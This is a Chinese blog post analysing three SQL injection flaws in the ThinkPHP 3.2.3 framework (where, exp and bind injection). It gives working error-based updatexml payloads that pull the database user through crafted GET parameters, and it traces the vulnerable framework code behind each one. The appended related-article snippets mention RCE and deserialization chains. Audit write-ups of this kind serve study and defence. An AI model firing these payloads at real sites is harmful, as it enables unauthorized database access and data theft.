thinkPHP3.2.3中sql注入漏洞

最新推荐文章于 2024-08-11 23:08:10 发布
最新推荐文章于 2024-08-11 23:08:10 发布
阅读量1.9k 收藏 1
点赞数 2
分类专栏: 审计 笔记 文章标签: sql php 缓存 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52988816/article/details/124989978
版权

下载:ThinkPHP3.2.3完整版 - ThinkPHP框架

配置

首先配置一下数据库

在这里插入图片描述

相对于TP5,可以先看下框架的特定函数

thinkphp3内置了很多大写函数

A 快速实例化Action类库
B 执行行为类
C 配置参数存取方法
D 快速实例化Model类库
F 快速简单文本数据存取方法
I 获取系统输⼊变(与tp5input方法类似)
L 语言参数存取方法
M 快速高性能实例化模型
R 快速远程调用Action类方法
S 快速缓存存取方法
U URL动态生成和重定向方法
W 快速Widget输出方法

thinkphp3.2.3 where注入

先说一下payload再分析

payload:

?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23

在这里插入图片描述

首先明确一点,确实是可以进行错报注入的

接下来我们展开分析

造成注入的代码为

$data = M('user')->find(I('GET.id'));

I和M方法都没有什么问题,问题在于find方法(/ThinkPHP/Mode/Lite/Model.class.php

我们跟进一下看看

public function find($options=array()) {
        if(is_numeric($options) || is_string($options)) {
            $where[$this->getPk()]  =   $options;
            $options                =   array();
            $options['where']       =   $where;
        }
        // 根据复合主键查找记录
        $pk  =  $this->getPk();
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {
            // 根据复合主键查询
            $count = 0;
            foreach (array_keys($options) as $key) {
                if (is_int($key)) $count++; 
            } 
            if ($count == count($pk)) {
                $i = 0;
                foreach ($pk as $field) {
                    $where[$field] = $options[$i];
                    unset($options[$i++]);
                }
                $options['where']  =  $where;
            } else {
                return false;
            }
        }
        // 总是查找一条记录
        $options['limit']   =   1;
        // 分析表达式
        $options            =   $this->_parseOptions($options);
        // 判断查询缓存
        if(isset($options['cache'])){
            $cache  =   $options['cache'];
            $key    =   is_string($cache['key'])?$cache['key']:md5(serialize($options));
            $data   =   S($key,'',$cache);
            if(false !== $data){
                $this->data     =   $data;
                return $data;
            }
        }
        $resultSet          =   $this->db->select($options);

先简单跟着走一遍
传入id=1时 ,首先经过ThinkPHP/Common/functions.php:htmlspecialchars()进行处理

之后回调think_filter

unction think_filter(&$value){
    // TODO 其他安全过滤

    // 过滤查询特殊字符
    if(preg_match('/^(EXP|NEQ|GT|EGT|LT|ELT|OR|XOR|LIKE|NOTLIKE|NOT BETWEEN|NOTBETWEEN|BETWEEN|NOTIN|NOT IN|IN)$/i',$value)){
        $value .= ' ';
    }
}

之后就进入find方法,又会经过ThinkPHP/Library/Think/Model.class.php:_parseOptions()方法

$options            =  $this->_parseOptions($options);
            return  '( '.$this->fetchSql(true)->select($options).' )';
        }
        // 分析表达式
        $options    =  $this->_parseOptions($options);
        // 判断查询缓存
        if(isset($options['cache'])){
            $cache  =   $options['cache'];
            $key    =   is_string($cache['key'])?$cache['key']:md5(serialize($options));
            $data   =   S($key,'',$cache);

跟进_parseOptions()``ThinkPHP/``Mode``/``L``i``te``/Model.class.php 其中有类型验证_parseType()函数

if(isset($opti ons['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) {
            // 对数组查询条件进行字段类型检查
            foreach ($options['where'] as $key=>$val){
                $key            =   trim($key);
                if(in_array($key,$fields,true)){
                    if(is_scalar($val)) {
                        $this->_parseType($options['where'],$key);
                    }
                }elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){
                    if(!empty($this->options['strict'])){
                        E(L('_ERROR_QUERY_EXPRESS_').':['.$key.'=>'.$val.']');
                    } 
                    unset($options['where'][$key]);
                }
            }
        }

这里是我们传入id的转换点,可以看下最里层的判断,如果绕过if,则进入_parseType

  protected function _parseType(&$data,$key) {
        if(!isset($this->options['bind'][':'.$key]) && isset($this->fields['_type'][$key])){
            $fieldType = strtolower($this->fields['_type'][$key]);
            if(false !== strpos($fieldType,'enum')){
                // 支持ENUM类型优先检测
            }elseif(false === strpos($fieldType,'bigint') && false !== strpos($fieldType,'int')) {
                $data[$key]   =  intval($data[$key]);
            }elseif(false !== strpos($fieldType,'float') || false !== strpos($fieldType,'double')){
                $data[$key]   =  floatval($data[$key]);
            }elseif(false !== strpos($fieldType,'bool')){
                $data[$key]   =  (bool)$data[$key];
            }
        }
    }

这里的话进行了一个强制类型转换,所以这里id会改变,最终带入$this->db->select($options)进行查询避免了注入问题。
id=1' -> I() -> find() -> _parseOptions() -> _parseType() 字符串清理

我们现在已经知道id在哪改变的,所以就可以绕过

if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))

index.php?id[where]=3 and 1=1就可以注入了

thinkphp 3.2.3 exp注入

还是先说payload

username[0]=exp&username[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)

这里的话先修改一下环境

public function index()
{
    $User = D('Users');
    $map = array('username' => $_GET['username']);
    // $map = array('username' => I('username'));
    $user = $User->where($map)->find();
    var_dump($user);
}

find()函数会执行到ThinkPHP/Mode/Lite/Model.class.php:822$this->db->select($options)
看一下select

/ThinkPHP/Library/Think/Db/Driver.class.php

public function select($options=array()) {
        $this->model  =   $options['model'];
        $this->parseBind(!empty($options['bind'])?$options['bind']:array());
        $sql    = $this->buildSelectSql($options);
        $result   = $this->query($sql,!empty($options['fetch_sql']) ? true : false);
        return $result;
    }

跟进buildSelectSql()

 public function buildSelectSql($options=array()) {
        if(isset($options['page'])) {
            // 根据页数计算limit
            list($page,$listRows)   =   $options['page'];
            $page    =  $page>0 ? $page : 1;
            $listRows=  $listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20);
            $offset  =  $listRows*($page-1);
            $options['limit'] =  $offset.','.$listRows;
        }
        $sql  =   $this->parseSql($this->selectSql,$options);
        return $sql;
    }

$this->parseSql()

public function parseSql($sql,$options=array()){
        $sql   = str_replace(
            array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'),
            array(
                $this->parseTable($options['table']),
                $this->parseDistinct(isset($options['distinct'])?$options['distinct']:false),
                $this->parseField(!empty($options['field'])?$options['field']:'*'),
                $this->parseJoin(!empty($options['join'])?$options['join']:''),
                $this->parseWhere(!empty($options['where'])?$options['where']:''),
                $this->parseGroup(!empty($options['group'])?$options['group']:''),
                $this->parseHaving(!empty($options['having'])?$options['having']:''),
                $this->parseOrder(!empty($options['order'])?$options['order']:''),
                $this->parseLimit(!empty($options['limit'])?$options['limit']:''),
                $this->parseUnion(!empty($options['union'])?$options['union']:''),
                $this->parseLock(isset($options['lock'])?$options['lock']:false),
                $this->parseComment(!empty($options['comment'])?$options['comment']:''),
                $this->parseForce(!empty($options['force'])?$options['force']:'')
            ),$sql);
        return $sql;
    }

通过parse系列函数来构建SQL语句 ,利用点在parseWhere,跟进一下看看作用

 protected function parseWhere($where) {
        $whereStr = '';
        if(is_string($where)) {
            // 直接使用字符串条件
            $whereStr = $where;
        }else{ // 使用数组表达式
            $operate  = isset($where['_logic'])?strtoupper($where['_logic']):'';
            if(in_array($operate,array('AND','OR','XOR'))){
                // 定义逻辑运算规则 例如 OR XOR AND NOT
                $operate    =   ' '.$operate.' ';
                unset($where['_logic']);
            }else{
                // 默认进行 AND 运算
                $operate    =   ' AND ';
            }
            foreach ($where as $key=>$val){
                if(is_numeric($key)){
                    $key  = '_complex';
                }
                if(0===strpos($key,'_')) {
                    // 解析特殊条件表达式
                    $whereStr   .= $this->parseThinkWhere($key,$val);
                }else{
                    // 查询字段的安全过滤
                    // if(!preg_match('/^[A-Z_\|\&\-.a-z0-9\(\)\,]+$/',trim($key))){
                    //     E(L('_EXPRESS_ERROR_').':'.$key);
                    // }
                    // 多条件支持
                    $multi  = is_array($val) &&  isset($val['_multi']);
                    $key    = trim($key);
                    if(strpos($key,'|')) { // 支持 name|title|nickname 方式定义查询字段
                        $array =  explode('|',$key);
                        $str   =  array();
                        foreach ($array as $m=>$k){
                            $v =  $multi?$val[$m]:$val;
                            $str[]   = $this->parseWhereItem($this->parseKey($k),$v);
                        }
                        $whereStr .= '( '.implode(' OR ',$str).' )';
                    }elseif(strpos($key,'&')){
                        $array =  explode('&',$key);
                        $str   =  array();
                        foreach ($array as $m=>$k){
                            $v =  $multi?$val[$m]:$val;
                            $str[]   = '('.$this->parseWhereItem($this->parseKey($k),$v).')';
                        }
                        $whereStr .= '( '.implode(' AND ',$str).' )';
                    }else{
                        $whereStr .= $this->parseWhereItem($this->parseKey($key),$val);
                    }
                }
                $whereStr .= $operate;
            }
            $whereStr = substr($whereStr,0,-strlen($operate));
        }
        return empty($whereStr)?'':' WHERE '.$whereStr;
    }

关键代码

elseif('bind' == $exp ){ // 使用表达式
                    $whereStr .= $key.' = :'.$val[1];
                }elseif('exp' == $exp ){ // 使用表达式
                    $whereStr .= $key.' '.$val[1];
                }

进入parseWhereItem()方法中

protected function parseWhereItem($key,$val) {
        $whereStr = '';
        if(is_array($val)) {
            if(is_string($val[0])) {
                $exp    =   strtolower($val[0]);

满足$val是数组,并且索引为0的值为字符串’exp’,那么就可以拼接sql语句了。所以我们传入

username[0]=exp&username[1]==1 and xino

说一下这里为甚要用GET而不是I()函数来获取参数 ,在where(0注入中会有个think_filter函数去过滤字符串,以至于穿不了exp

thinkphp 3.2.3 bind注入

先说payload

?id[0]=bind&id[1]=0 and updatexml(1,concat(0x7e,user(),0x7e),1)&password=7

环境搭建

public function index()
{
    $User = M("Users");
    $user['id'] = I('id');
    $data['password'] = I('password');
    $valu = $User->where($user)->save($data);
    var_dump($valu);
}

一开始差不多都一样,我们跟进save()

public function save($data='',$options=array()) {
        if(empty($data)) {
            // 没有传递数据,获取当前数据对象的值
            if(!empty($this->data)) {
                $data           =   $this->data;
                // 重置数据
                $this->data     =   array();
            }else{
                $this->error    =   L('_DATA_TYPE_INVALID_');
                return false;
            }
        }
        // 数据处理
        $data       =   $this->_facade($data);
        if(empty($data)){
            // 没有数据则不执行
            $this->error    =   L('_DATA_TYPE_INVALID_');
            return false;
        }
        // 分析表达式
        $options    =   $this->_parseOptions($options);
        $pk         =   $this->getPk();
        if(!isset($options['where']) ) {
            // 如果存在主键数据 则自动作为更新条件
            if (is_string($pk) && isset($data[$pk])) {
                $where[$pk]     =   $data[$pk];
                unset($data[$pk]);
            } elseif (is_array($pk)) {
                // 增加复合主键支持
                foreach ($pk as $field) {
                    if(isset($data[$field])) {
                        $where[$field]      =   $data[$field];
                    } else {
                           // 如果缺少复合主键数据则不执行
                        $this->error        =   L('_OPERATION_WRONG_');
                        return false;
                    }
                    unset($data[$field]);
                }
            }
            if(!isset($where)){
                // 如果没有任何更新条件则不执行
                $this->error        =   L('_OPERATION_WRONG_');
                return false;
            }else{
                $options['where']   =   $where;
            }
        }

        if(is_array($options['where']) && isset($options['where'][$pk])){
            $pkValue    =   $options['where'][$pk];
        }
        if(false === $this->_before_update($data,$options)) {
            return false;
        }
        $result     =   $this->db->update($data,$options);
        if(false !== $result && is_numeric($result)) {
            if(isset($pkValue)) $data[$pk]   =  $pkValue;
            $this->_after_update($data,$options);
        }
        return $result;
    }

会有个update(),跟进一下
ThinkPHP/Library/Think/Db/Driver.class.php

public function update($data,$options) {
        $this->model  =   $options['model'];
        $this->parseBind(!empty($options['bind'])?$options['bind']:array());
        $table  =   $this->parseTable($options['table']);
        $sql   = 'UPDATE ' . $table . $this->parseSet($data);
        if(strpos($table,',')){// 多表更新支持JOIN操作
            $sql .= $this->parseJoin(!empty($options['join'])?$options['join']:'');
        }
        $sql .= $this->parseWhere(!empty($options['where'])?$options['where']:'');
        if(!strpos($table,',')){
            //  单表更新支持order和lmit
            $sql   .=  $this->parseOrder(!empty($options['order'])?$options['order']:'')
                .$this->parseLimit(!empty($options['limit'])?$options['limit']:'');
        }
        $sql .=   $this->parseComment(!empty($options['comment'])?$options['comment']:'');
        return $this->execute($sql,!empty($options['fetch_sql']) ? true : false);
    }

可以发现经过parseWhere(),

$sql   = 'UPDATE ' . $table . $this->parseSet($data);

跟进parseSet()

protected function parseSet($data) {
        foreach ($data as $key=>$val){
            if(is_array($val) && 'exp' == $val[0]){
                $set[]  =   $this->parseKey($key).'='.$val[1];
            }elseif(is_null($val)){
                $set[]  =   $this->parseKey($key).'=NULL';
            }elseif(is_scalar($val)) {// 过滤非标量数据
                if(0===strpos($val,':') && in_array($val,array_keys($this->bind)) ){
                    $set[]  =   $this->parseKey($key).'='.$this->escapeString($val);
                }else{
                    $name   =   count($this->bind);
                    $set[]  =   $this->parseKey($key).'=:'.$name;
                    $this->bindParam($name,$val);
                }
            }
        }
        return ' SET '.implode(',',$set);
    }

$this->bindParam($name,$val);

protected function bindParam($name,$value){
        $this->bind[':'.$name]  =   $value;
    }

name为0,所以拼接:0
返回上面sql语句,就会多一个:,搞明白这点,我们走经过了parseWhere() ,和exp注入一样

id[0]=bind&id[1]=aa

UPDATE users SET password=‘’ WHERE id = :aa
那要如何去掉:

进入到 ThinkPHP/Library/Think/Db/Driver.class.phpexecute()

if(!empty($this->bind)){
            $that   =   $this;
            $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '\''.$that->escapeString($val).'\''; },$this->bind));
        }

替换操作,是将:0替换为外部传进来的字符串,所以我们让我们的参数也等于0,这样就拼接了一个:0,然后会通过strtr()被替换为1,这样sql语句就通顺了
bind[:0]=1变为bind[:0]='1' ,接着strtr函数将$this->queryStr中的:0替换成了1

UPDATE `users` SET `password`=:0 WHERE `id` = :0 and updatexml(1,concat(0x7e,user(),0x7e),1)

替换为

UPDATE `users` SET `password`='1' WHERE `id` = '1' and updatexml(1,concat(0x7e,user(),0x7e),1)

参考博客:https://y4er.com/post/thinkphp3-vuln/

XINO丶
关注
专栏目录
thinkphp3.2.3漏洞_命令执行漏洞
weixin_39724287的博客
11-21 840
No.1漏洞描述命令执行漏洞是指服务器没有对执行的命令进行过滤,用户可以随意执行系统命令,命令执行漏洞属于高危漏洞之一。如PHP的命令执行漏洞主要是基于一些函数的参数过滤不足导致,可以执行命令的函数有system( )、exec( )、shell_exec( )、passthru( )、pcntl_execl( )、popen( )、proc_open( )等。当攻击者可以控制这些函数的参数时,...
Thinkphp3.2.3及以下版本漏洞整理
热门推荐
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
Thinkphp 3.2.3 sql注入漏洞
giaogiao123的博客
08-27 1394
源代码 class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); } } 创建一个test数据库 然后开启mysql命令行 CREATE TABLE `Course`( `id` VARCHAR(20), `username` VARCHAR
11-PHP代码审计——thinkphp3.2.3 find,select,delete注入漏洞
网络安全
05-06 579
find注入poc: id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)-- find注入漏洞示例程序: class IndexController extends Controller { public function index(){ $id = I("id"); $data = M("users")->find($id); dump($data); .
sql注入实战——thinkPHP
最新发布
Sesessep的博客
08-11 1307
下载thinkPHP文件解压,将framework关键文件放到think-5.0.15,改名为thinkphp再将think-5.0.15放到WWW文件夹输入localhost/WWW/think-5.0.15/public/index.php,访问应用入口文件搭建完成。
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4678
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
thinkPHP3.2.3sql注入漏洞
qq_50589021的博客
10-05 4409
前言 攻敌所必救: ThinkPHP的常用方法汇总总结:M方法,D方法,U方法,I方法 Thinkphp3.2.3 安全开发须知 搭建: 首先第一步就是必须先放在www目录下(我是windows用的phpstudy)!!!! 创建数据库,表名一定与你接下来要M的名字的相对应 连接数据库的文件不多说了,自己配置:ThinkPHP/Conf/convention.php 配置控制器:\WWW\thinkphp3.2.3\Application\Home\Controller\Ind
[复现]Thinkphp3.2.3 漏洞
kuuhh的博客
08-02 1万+
前言 纸上得来终觉浅,绝知此事要躬行。 日志泄露 ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且日志结构容易被猜解,造成信息泄露。 THINKPHP3.1结构:Runtime/Logs/Home/年份_月份_日期.log THINKPHP3.2 结构:Application/Runtime/Logs/Home/年份_月份_日期.log 需要注意的是日志的路径不是绝对的,开发者可以修改的,平时可以收集下用时fuzz。 SQL 注入 user表 一个小例子 代码如下 $id
thinkphp3.2.3 SQL注入漏洞复现
feng的博客
02-24 5983
前言 具体代码可以composer或者github或者一些其他网站上下载。 然后本地创建一下数据库,改一下数据库的配置,在ThinkPHP/Conf/convention.php下面: 由于比较懒,我直接用sqli-labs的数据库了,在IndexController.class.php里面写个查询: class IndexController extends Controller { public function index(){ $data = M('users')-&gt
think3.2.3_sql注入分析1
08-03
在本文,我们将深入探讨关于ThinkPHP 3.2.3版本SQL注入漏洞,特别是如何利用这个漏洞以及其成因。SQL注入是一种常见的安全漏洞,允许攻击者通过输入恶意SQL代码来操纵数据库,获取、修改或删除敏感数据。 ...
ThinkPHP3.2.3_where注入
11-21 563
漏洞环境 ThinkPHP3.2.3 漏洞代码<?php namespace Home\Controller; use Think\Controller; class IndexController extends Controller { public function index(){ $data = M('users')->find(I('GET.id')); var_dump($data); } } POC/?id[where]=1
ThinkPHP 3.2.3 核心版.zip
05-23
修正可能的SQL注入漏洞;[其它方面]支持全局路由定义;增加插件控制器支持;增加对全局和模块的模板路径的灵活设置;日志目录分模块存放;增加memcacheSession驱动;改进session函数的数组操作;修正一系列存在的...
安全漏洞ThinkPHP 3.2.3 漏洞复现
HBohan的博客
09-04 1681
$this->show 造成命令执行 在 Home\Controller\IndexController 下的index传入了一个可控参数,跟进调试看一下。 class IndexController extends Controller { public function index($n='') { $this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ paddi
thinkPHP3.2.3反序列化漏洞
qq_50589021的博客
10-10 1503
前言 ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 利用链: __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()-> 搭建: 路径:/Application/Home/Controller/IndexController.class.php public fu
thinkphp3.2.3漏洞_信息安全漏洞月报(2020年5月)
weixin_39945795的博客
11-23 3029
漏洞态势根据国家信息安全漏洞库(CNNVD)统计,2020年5月份采集安全漏洞共1186个。本月接报漏洞16377个,其信息技术产品漏洞(通用型漏洞)201个,网络信息系统漏洞(事件型漏洞)16176个。重大漏洞预警微软多个安全漏洞:包括Microsoft SharePoint 安全漏洞(CNNVD-202005-567、CVE-2020-1024)、Microsof...
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
程序员六七的博客
05-16 560
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
Thinkphp3.2.3最新版update注入漏洞
Fly_鹏程万里
12-13 9652
简要描述  thinkphp是国内著名的php开发框架,有完善的开发文档,基于MVC架构,其Thinkphp3.2.3是目前使用最广泛的thinkphp版本,虽然已经停止新功能的开发,但是普及度高于新出的thinkphp5系列,由于框架实现安全数据库过程在update更新数据的过程存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入。 Git补丁更新 新增加了BIND表...
php新版还有漏洞吗,Thinkphp3.2.3发现新版SQL注入漏洞
weixin_39627665的博客
03-10 316
安全客文章报道发现Thinkphp3.2.3最新版SQL注入漏洞!还使用Thinkphp3.2.3版本的小伙伴赶紧去github上更新补丁!漏洞详情由于框架实现安全数据库过程在update更新数据的过程存在SQL语句的拼接,并且当传入数组未过滤时导致出现了SQL注入thinkphp系列框架过滤表达式注入多半采用I函数去调用think_filter有没有相关tips来达到I函数绕过呢?是可以的...
ThinkPHP3.2.3 SQL注入分析:update注入详解
这篇关于"think3.2.3_sql注入分析1"的文章聚焦于ThinkPHP 3.2.3版本存在的一个SQL注入漏洞ThinkPHP是一个广泛使用的PHP框架,其在早期版本存在的一些设计缺陷可能导致安全风险。 在描述提到的漏洞代码实例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值